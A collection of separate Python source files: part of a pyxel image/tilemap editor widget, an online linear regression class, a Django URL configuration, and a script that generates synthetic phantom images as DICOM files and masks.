self._add_post_history(dest)
def __on_mouse_click(self, key, x, y):
if key == pyxel.MOUSE_RIGHT_BUTTON:
x = self.viewport_x + (x - self.x) // 8
y = self.viewport_y + (y - self.y) // 8
if self._is_tilemap_mode:
self.parent.color = pyxel.tilemap(self.parent.tilemap).data[y, x]
else:
self.parent.color = pyxel.image(self.parent.image).data[y, x]
def __on_mouse_drag(self, key, x, y, dx, dy):
if key == pyxel.MOUSE_LEFT_BUTTON:
x1 = self._press_x
y1 = self._press_y
x2 = (x - self.x - 1) // 8
y2 = (y - self.y - 1) // 8
if self.parent.tool == TOOL_SELECT:
x2 = min(max(x2, 0), 15)
y2 = min(max(y2, 0), 15)
self._select_x1, self._select_x2 = (x1, x2) if x1 < x2 else (x2, x1)
self._select_y1, self._select_y2 = (y1, y2) if y1 < y2 else (y2, y1)
elif self.parent.tool == TOOL_PENCIL:
if self._is_assist_mode:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
else:
self._overlay_canvas.line(
self._last_x, self._last_y, x2, y2, self.parent.color
)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(
x1, y1, x2, y2, self.parent.color, self._is_assist_mode
)
self._last_x = x2
self._last_y = y2
elif key == pyxel.MOUSE_RIGHT_BUTTON:
self._drag_offset_x -= dx
self._drag_offset_y -= dy
if abs(self._drag_offset_x) >= 16:
offset = self._drag_offset_x // 16
self.viewport_x += offset * 8
self._drag_offset_x -= offset * 16
if abs(self._drag_offset_y) >= 16:
offset = self._drag_offset_y // 16
self.viewport_y += offset * 8
self._drag_offset_y -= offset * 16
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
def __on_mouse_hover(self, x, y):
if self.parent.tool == TOOL_SELECT:
s = "COPY:CTRL+C PASTE:CTRL+V"
elif self._is_dragged:
s = "ASSIST:SHIFT"
else:
s = "PICK:R-CLICK VIEW:R-DRAG"
x, y = self._screen_to_view(x, y)
x += self.viewport_x
y += self.viewport_y
self.parent.help_message = s + " ({},{})".format(x, y)
def __on_update(self):
if self._is_dragged and not self._is_assist_mode and pyxel.btn(pyxel.KEY_SHIFT):
self._is_assist_mode = True
x1 = self._press_x
y1 = self._press_y
x2 = self._last_x
y2 = self._last_y
if self.parent.tool == TOOL_PENCIL:
self._overlay_canvas.clear()
self._overlay_canvas.line(x1, y1, x2, y2, self.parent.color)
elif self.parent.tool == TOOL_RECTB:
self._overlay_canvas.clear()
self._overlay_canvas.rectb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_RECT:
self._overlay_canvas.clear()
self._overlay_canvas.rect(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRCB:
self._overlay_canvas.clear()
self._overlay_canvas.circb(x1, y1, x2, y2, self.parent.color, True)
elif self.parent.tool == TOOL_CIRC:
self._overlay_canvas.clear()
self._overlay_canvas.circ(x1, y1, x2, y2, self.parent.color, True)
if (
self.parent.tool == TOOL_SELECT
and self._select_x1 >= 0
and pyxel.btn(pyxel.KEY_CONTROL)
):
if pyxel.btnp(pyxel.KEY_C):
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
src = data[
self.viewport_y
+ self._select_y1 : self.viewport_y
+ self._select_y2
+ 1,
self.viewport_x
+ self._select_x1 : self.viewport_x
+ self._select_x2
+ 1,
]
self._copy_buffer = src.copy()
elif self._copy_buffer is not None and pyxel.btnp(pyxel.KEY_V):
x1 = self.viewport_x + self._select_x1
y1 = self.viewport_y + self._select_y1
height, width = self._copy_buffer.shape
width -= max(self._select_x1 + width - 16, 0)
height -= max(self._select_y1 + height - 16, 0)
if self._is_tilemap_mode:
data = pyxel.tilemap(self.parent.tilemap).data
else:
data = pyxel.image(self.parent.image).data
dest = data[y1 : y1 + height, x1 : x1 + width]
dest[:, :] = self._copy_buffer[:height, :width]
if (
pyxel.btn(pyxel.KEY_SHIFT)
or pyxel.btn(pyxel.KEY_CONTROL)
or pyxel.btn(pyxel.KEY_ALT)
):
return
if pyxel.btnp(pyxel.KEY_LEFT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x -= 8
if pyxel.btnp(pyxel.KEY_RIGHT, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_x += 8
if pyxel.btnp(pyxel.KEY_UP, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y -= 8
if pyxel.btnp(pyxel.KEY_DOWN, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.viewport_y += 8
self.viewport_x = min(max(self.viewport_x, 0), 240)
self.viewport_y = min(max(self.viewport_y, 0), 240)
self._h_scroll_bar.value = self.viewport_x // 8
self._v_scroll_bar.value = self.viewport_y // 8
def __on_draw(self):
self.draw_panel(self.x, self.y, self.width, self.height)
if self._is_tilemap_mode:
pyxel.bltm(
self.x + 1,
self.y + 1,
self.parent.tilemap,
self.viewport_x,
self.viewport_y,
16,
16,
)
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
sx = (val % 32) * 8
sy = (val // 32) * 8
pyxel.blt(x, y, self.parent.image, sx, sy, 8, 8)
else:
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
col = self._overlay_canvas.data[i, j]
else:
data = pyxel.image(self.parent.image).data
col = data[self.viewport_y + i, self.viewport_x + j]
pyxel.rect(x, y, x + 7, y + 7, col)
pyxel.line(self.x + 1, self.y + 64, self.x + 128, self.y + 64, 1)
pyxel.line(self.x + 64, self.y + 1, self.x + 64, self.y + 128, 1)
if self.parent.tool == TOOL_SELECT and self._select_x1 >= 0:
pyxel.clip(self.x + 1, self.y + 1, self.x + 128, self.y + 128)
x1 = self._select_x1 * 8 + 12
y1 = self._select_y1 * 8 + 17
x2 = self._select_x2 * 8 + 19
y2 = self._select_y2 * 8 + 24
pyxel.rectb(x1, y1, x2, y2, 15)
pyxel.rectb(x1 + 1, y1 + 1, x2 - 1, y2 - 1, 0)
pyxel.rectb(x1 - 1, y1 - 1, x2 + 1, y2 + 1, 0)
pyxel.clip()
def __on_h_scroll_bar_change(self, value):
self.viewport_x = value * 8
def __on_v_scroll_bar_change(self, value):
self.viewport_y = value * 8
|
""" Online version of regression
"""
import numpy as np
import logging
class LinReg(object):
""" Implements online version of linear regression according
to ML Lecture
"""
def __init__(self, dim_in, dim_out, dim_basis, basis_fcts):
""" Initializes Object
Args:
dim_in (int): Dimensionality of input
dim_out (int): Dimensionality of output
dim_basis (int): Dimensionality of vector of basis functions
basis_fcts (array): column array of transfer functions (first
element has to be one) with as many rows as dim_in
Note:
The basis function will be given a matrix where samples are
stored rowwise. The basis function must return a Matrix with
the same number of rows, columns may differ
Available Basis Functions:
tanh: Apply hyperbolic tangent to each element of x_{i}
sigmoid: Apply sigmoid to each element of x_{i}
polynomial: Raise each feature to power according to position
that is first feature to power 0, nth feature to power n-1
"""
self._W = np.random.randn(dim_basis, dim_out)
self._climin_W = self._W.flatten()
""" weight matrix, columns as features due to activation functions, rows as classes """
self._psi = self._register_basis_function(basis_fcts)
""" Apply respective transfer function to each feature """
def _register_basis_function(self, basis_fcts):
""" Checks if one of supported keywoards and creates fct accordingly
"""
if basis_fcts == 'tanh':
return np.tanh
elif basis_fcts == 'sigmoid':
return lambda X: np.divide(1., np.add(1., np.exp(-X)))
elif basis_fcts == 'polynomial':
return lambda X: np.power(X, np.arange(X.shape[1]))
else:
return basis_fcts
def grad(self, X, Z):
""" Calculates gradient for minibatch
Args:
X (np.ndarray): data matrix, columns are features, rows are samples
Z (np.ndarray): targets, columns are classes, rows are samples
Returns:
array of shape (dim_basis, dim_out), i.e. one column per output dimension
"""
X_ = self._psi(X)
#logging.debug('LinReg.grad - Shape of transformed data: ' + \
# '{}'.format(X_.shape)
# )
# batchsize x dim_basis
Y = np.dot(X_, self._W) # (batchsize, dim_basis) * (dim_basis, dim_out)
# batchsize x dimout
D = np.subtract(Z, Y)
# (batchsize, dim_out)
g = np.dot(D.T, X_) # (dim_out, batchsize) * (batchsize, dim_basis)
# (dim_out, dim_basis)
#logging.debug('LinReg.grad - Shape gradient before normalization: ' + \
# '{}'.format(g.shape)
# )
ft_magnitudes = np.sqrt(np.sum(np.power(g, 2), axis=1)).reshape(-1, 1)
#logging.debug('LinReg.grad - magnitudes: {}'.format(ft_magnitudes))
# Take magnitude for each output dimension
g = np.divide(g, ft_magnitudes)
# ``ft_magnitudes`` is a column vector of length ``dim_out``
# Therefore transpose gradient
#logging.debug('LinReg.grad - Shape gradient after normalization: ' + \
# '{}'.format(g.shape)
# )
# (dim_out, dim_basis) / (dim_out, 1): make the gradient for each output
# dimension unit length
return g.T
# (dim_basis, dim_out)
def loss(self, X, Z):
""" Let Y be the prediction
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
Y = self.predict(X)
# (batchsize, dim_out)
D = np.subtract(Z, Y)
# (batchsize, dim_out)
loss = np.mean(np.sum(np.power(D, 2), axis=1))
# (n, dz) --> (n,) --> scalar: squared error summed over outputs, averaged over the batch
return loss
def train(self, X, Z, alpha=0.001):
""" Performs online learning step using gradient descend on a minibatch
Args:
X (numpy.ndarray): Minibatch
Z (numpy.ndarray): Targets for minibatch (rowwise,
one row one sample)
alpha (float, optional): Learning Rate
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
#logging.debug(
# 'LinReg.train - Shape of weights before training: ' + \
# '{}'.format(self._W.shape)
# )
grad = self.grad(X, Z)
corr = alpha * grad
self._W = self._W + corr
#logging.debug(
# 'LinReg.train - Shape of weights after ' + \
# 'training: {}'.format(self._W.shape)
# )
def predict(self, X):
""" Predicts values for given dataset
Args:
X (numpy.ndarray): Data
Returns:
prediction, numpy.ndarray
"""
""" Predicts value for a single vector
"""
X_ = self._psi(X)
#logging.debug('LinReg.predict - shape of weights: {}'.format(self._W.shape))
#logging.debug('LinReg.predict - shape of weights: {}'.format(X_.shape))
Y = np.dot(X_, self._W)
return Y
def unpack_parameters(self, parameters):
return parameters.reshape(self._W.shape)
def climin_predict(self, parameters, input):
W = self.unpack_parameters(parameters)
X_ = self._psi(input)
Y = np.dot(X_, W)
return Y
def climin_grad(self, parameters, input, targets):
W = self.unpack_parameters(parameters)
X_ = self._psi(input)
# batchsize x dim_basis
Y = np.dot(X_, W) # (batchsize, dim_basis) * (dim_basis, dim_out)
# batchsize x dimout
D = np.subtract(targets, Y)
# (batchsize, dim_out)
g = np.dot(D.T, X_) # (dim_out, batchsize) * (batchsize, dim_basis)
# (dim_out, dim_basis)
ft_magnitudes = np.sqrt(np.sum(np.power(g, 2), axis=1)).reshape(-1, 1)
# Take magnitude for each output dimension
g = np.divide(g, ft_magnitudes)
# ``ft_magnitudes`` is a column vector of length ``dim_out``
# Therefore transpose gradient before returning
# (dim_out, dim_basis) / (dim_out, 1): make the gradient for each output
# dimension unit length
return g.T.flatten()
def climin_loss(self, X, Z):
""" Let Y be the prediction
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
Y = self.climin_predict(self._climin_W, X)
# (batchsize, dim_out)
D = np.subtract(Z, Y)
# (batchsize, dim_out)
loss = np.mean(np.sum(np.power(D, 2), axis=1))
# (n, dz) --> (n,) --> scalar: squared error summed over outputs, averaged over the batch
return loss
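
# A minimal usage sketch (not part of the original module), assuming the 'polynomial'
# basis described in the class docstring: column i of the design matrix is raised to
# the power i, so a raw 1-D input is simply repeated across ``dim_basis`` columns.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    x = rng.uniform(-1.0, 1.0, size=(200, 1))
    z = 2.0 + 0.5 * x - 1.5 * x ** 2              # quadratic target, shape (200, 1)
    dim_basis = 3
    X = np.repeat(x, dim_basis, axis=1)           # columns become x**0, x**1, x**2 after _psi
    model = LinReg(dim_in=1, dim_out=1, dim_basis=dim_basis, basis_fcts='polynomial')
    for _ in range(2000):
        model.train(X, z, alpha=0.01)
    print('final loss:', model.loss(X, z))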
|
from django.conf.urls import url
from django.contrib import admin
from medeina.views import IssueStatsView, main, ListIssuesView, UpdateIssueView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', main, name='main'),
url(r'^issues/list$', ListIssuesView.as_view(), name='list_issues'),
url(
r'^issues/(?P<pk>\d+)/update$',
UpdateIssueView.as_view(),
name='update_issue'
),
url(r'^issues/stats$', IssueStatsView.as_view(), name='issue_stats'),
]
|
import os
from os.path import exists, join
import numpy as np
import imageio
import scipy.ndimage as ndi
import scipy.ndimage.morphology as morph
import scipy.ndimage.filters as filters
import pydicom
import datetime, time
import math
import argparse
import yaml
import itertools
import png_to_dso
import shutil
# Collects User Input
parser = argparse.ArgumentParser(description="Upload Config and Output")
parser.add_argument('--config', '-c', action="store", required=False, help="Config File",default='config_dros.yaml')
parser.add_argument('--output', '-o', action="store", required=False, help="Output directory",default='Output/')
results = parser.parse_args()
# Set of Default Parameters
default_parameters = {
# Size Features
"mean_radius": [100, 100, 1],
# Shape Features
"x_deformation": [1, 1, 1],
"y_deformation": [1, 1, 1],
"z_deformation": [1, 1, 1],
"surface_frequency": [0, 0, 1],
"surface_amplitude": [0, 0, 1],
# Intensity Features
"mean_intensity": [100, 100, 1],
# Texture Features
"texture_wavelength": [0, 0, 1],
"texture_amplitude": [0, 0, 1],
# Margin Features
"gaussian_standard_deviation": [0, 0, 1]
}
# Keys in the Order for the DRO Name
ordered_keys = ["mean_radius",
"x_deformation","y_deformation", "z_deformation","surface_frequency", "surface_amplitude",
"mean_intensity",
"texture_wavelength", "texture_amplitude",
"gaussian_standard_deviation"]
# process_input
# Takes: raw yaml file received from the user
# Does: extracts all values into lists associated with each parameter
# Returns: processed dictionary of parameters names as keys and lists of values
def process_input(yml_file):
with open(yml_file) as file:
yaml_input = yaml.safe_load(file)
try:
user_parameters = yaml_input["parameters"]
if user_parameters is None:
raise Exception("Empty Parameters Dictionary")
except:
print("Error in YAML File, Defaulting to Default Parameters")
user_parameters = default_parameters
for parameter in default_parameters:
if parameter not in user_parameters or user_parameters[parameter] is None:
user_parameters[parameter] = default_parameters[parameter]
return user_parameters
# expand_range
# Takes: dictionary of parameters
# Does: expands the min, max, number of values into array of values at equal intervals
# Returns: dictionary of parameters with full arrays of values
def expand_range(dic):
expanded = {}
for key in dic.keys():
kmax = dic[key][0]
kmin = dic[key][1]
knum = dic[key][2]
expanded[key] = frange(kmin, kmax, knum)
return expanded
# generate_params
# Takes: dictionary of parameters with full arrays of values
# Does: find all combinations of parameters of all ranges of values
# Returns: array of all combinations of parameters
def generate_params(dic):
params = []
for key in ordered_keys:
params.append(dic[key])
params = list(itertools.product(*params))
params = [list(p) for p in params]
return params
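# A small, self-contained illustration (hypothetical helper, never called by this
# script) of how the parameter triples expand and combine: for each key the first
# two entries become the endpoints of a linspace with as many points as the third
# entry, and generate_params then takes the cartesian product over all keys.
def _example_param_grid():
    demo = dict(default_parameters)
    demo["mean_radius"] = [120, 80, 3]       # expands to [80.0, 100.0, 120.0]
    demo["mean_intensity"] = [150, 50, 2]    # expands to [50.0, 150.0]
    combos = generate_params(expand_range(demo))
    return combos                            # 3 * 2 * 1 * ... = 6 parameter combinations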
# generate_all_dros
# Takes: array of all combinations of parameters
# Does: generates the images and masks for each combination of parameters
# Returns: List of all folders for all images generated
def generate_all_dros(params, output):
dicoms = []
masks = []
dsos = []
for param in params:
name, dicom, mask = generate_single_dro(param, output)
dso = png_to_dso.make_dsos(mask, dicom, output)
dicoms.append(dicom)
masks.append(mask)
dsos.append(dso)
return [dicoms, masks, dsos]
# generate
# Takes: list of arguments for a single DRO
# Does: make unique ids for the dro
# generate all files for the dro
# Return: list of the name and locations of the dros files
def generate_single_dro(arguments, output):
arguments = [float(arg) for arg in arguments]
global r, xx, yy, zz, shape_freq, shape_amp, avg, text_wav, text_amp, decay
r, xx, yy, zz, shape_freq, shape_amp, avg, text_wav, text_amp, decay = arguments
make_folders(arguments, output)
make_unique()
mask, output_array = generate_dro()
write_dro_files(mask, output_array)
return [name, dicom_folder, mask_folder]
# make_folders
# Takes: argument list for a single dro
# Does: generate unique name for the dro
# create dicom and mask folder for this dro
# Return: nothing
def make_folders(arguments, output):
global name
name = 'Phantom'
for arg in arguments:
name = name + '-' + str(arg)
global mask_folder, dicom_folder
mask_folder = os.path.join(os.path.join(output,'Mask'),name)
dicom_folder = os.path.join(os.path.join(output,'DICOM'),name)
if not exists(mask_folder):
os.makedirs(mask_folder)
if not exists(dicom_folder):
os.makedirs(dicom_folder)
return []
# make_unique
# Takes: nothing
# Does: generate unique ids for the dro
# Return: nothing
def make_unique():
global instance_uid, instance_step
instance_uid = pydicom.uid.generate_uid()[:-2] + ".1"
instance_step = instance_uid
# Generate File by Slice
def write_dro_files(mask, output_array):
n = np.shape(mask)[-1]
print('dro generated')
for k in range(n):
# Once a complete 2D Slice has been generated, write this to png and dicom
png_name = mask_folder+'/slice' + str(k).zfill(3) + '.png'
mask_slice = mask[:, :, k].astype(np.uint8)
imageio.imwrite(png_name, mask_slice)
slice_to_write = output_array[:,:,k]
write_dicom(slice_to_write, dicom_folder+'/slice' + str(k).zfill(3) + '.dcm', k,mask[:, :, k])
# generate_dro
# Takes: nothing
# Does: generate dro from its mathematical definition
# Return: image array embedding the object and mask for the object
def generate_dro():
n = 300
s = 512
# Make 3D Grid
x = np.linspace(-s/2,s/2,s)
y = np.linspace(-s/2,s/2,s)
z = np.linspace(-n/2,n/2,n)
xt, yt, zt = np.meshgrid(x,y,z,sparse=True) # xt stands for "x-true"
if xx != 1 or yy != 1 or zz != 1:
xs, ys, zs = np.meshgrid(1/float(xx)*x,1/float(yy)*y,1/float(zz)*z,sparse=True) # xs stands for "x stretch"
else:
xs, ys, zs = xt, yt, zt
# Calculate distance to origin of each point then compare to the shape of the object
origin = np.sqrt(xs*xs + ys*ys + zs*zs)
rp = r
if shape_amp != 0.0 and shape_freq != 0.0:
rp = r * (1 + shape_amp * np.sin(shape_freq * np.arccos(zs/origin)) * \
np.cos(shape_freq * np.arctan2(ys,xs)))
mask = rp >= origin
# Apply Texture
texture = np.full_like(mask,1024,dtype=float)
if text_amp != 0.0 and text_wav != 0.0:
variation = avg + text_amp * np.cos((1 / text_wav) * 2 * np.pi * xt) * \
np.cos((1 / text_wav) * 2 * np.pi * yt) * \
np.cos((1 / text_wav) * 2 * np.pi * zt)
texture += variation
else:
texture += avg
# Add blurred edge
if decay != 0:
big = morph.binary_dilation(mask,iterations=10)
texture[~big] = 0
inside = np.copy(texture)
inside[~mask] = 0
texture = filters.gaussian_filter(texture,sigma=decay)
output_array = texture
texture[mask] = 0
output_array = inside + texture
else:
texture[~mask] = 0
output_array = texture
return mask, output_array
# prepare_zips
# Takes: folders for dicoms, masks, and dsos
# Does: zips all folders
# Returns: locations of all the zipped folders
def prepare_zips(dicoms, masks, dsos, output):
cur = output
for path in dicoms:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'DICOM',os.path.basename(path))
os.rename(path,move)
for path in masks:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'Mask',os.path.basename(path))
os.rename(path,move)
for path in dsos:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'DSO',os.path.basename(path))
os.rename(path,move)
dizip = os.path.join(cur,'dicoms')
mazip = os.path.join(cur,'masks')
dszip = os.path.join(cur,'dsos')
shutil.make_archive(dizip, 'zip', os.path.join(cur,'DICOM'))
shutil.make_archive(mazip, 'zip', os.path.join(cur,'Mask'))
shutil.make_archive(dszip, 'zip', os.path.join(cur,'DSO'))
cleanup([os.path.join(cur,'DICOM'), os.path.join(cur,'Mask'), os.path.join(cur,'DSO')])
return [dizip+'.zip', mazip+'.zip', dszip+'.zip']
# cleanup
# Takes: top folder
# Does: deletes everything
# Returns: nothing
def cleanup(big_folders):
for folder in big_folders:
shutil.rmtree(folder, ignore_errors=True)
#Writes a DICOM file using an input array, filename, and slice number
def write_dicom(slice_to_write, filename, step,mask_slice):
ds = pydicom.dcmread(curr + '/dro_template.dcm')
ds.ContentDate = str(datetime.date.today()).replace('-', '')
global instance_step
if step == 0:
ds.file_meta.MediaStorageSOPInstanceUID = instance_uid
else:
instance_step = instance_step[:-5]+str(float(instance_step[-5:])+1)
ds.file_meta.MediaStorageSOPInstanceUID = instance_step
ds.SOPInstanceUID = ds.file_meta.MediaStorageSOPInstanceUID
ds.InstanceNumber = step + 1
ds[0x0009,0x111e].value = ds.file_meta.MediaStorageSOPInstanceUID
ds[0x0009,0x1146].value = ds.file_meta.MediaStorageSOPInstanceUID
ds.StudyInstanceUID = instance_uid[:-1] + '5'
ds.SeriesInstanceUID = instance_uid[:-1] + '6'
ds.PatientName = name
ds.PatientID = name
ds.PatientSex = "O"
(ds.Rows, ds.Columns) = slice_to_write.shape  # numpy shape is (rows, columns)
slice_to_write_unsign = slice_to_write.astype(np.uint16)
ds.PixelData = slice_to_write_unsign.tobytes()  # tostring() is a deprecated alias of tobytes()
ds.SliceThickness = str(1)
ds.ReconstructionDiameter = str(512.0)
ds.PixelSpacing = [str(1),str(1)]
ds.ImagePositionPatient[2] = str(float(ds.ImagePositionPatient[2]) - step * float(ds.SliceThickness))
ds.SliceLocation = str(float(ds.SliceLocation) - step * float(ds.SliceThickness))
ds.save_as(filename)
return
# Create a numpy range
def frange(start, stop, step):
return np.linspace(start, stop, num=step).tolist()
if __name__ == '__main__':
output = results.output
curr = os.path.dirname(os.path.abspath(__file__))
processed_inputs = process_input(results.config)
expanded_ranges = expand_range(processed_inputs)
full_param_list = generate_params(expanded_ranges)
dicoms, masks, dsos = generate_all_dros(full_param_list, output)
zips = prepare_zips(dicoms, masks, dsos, output)
|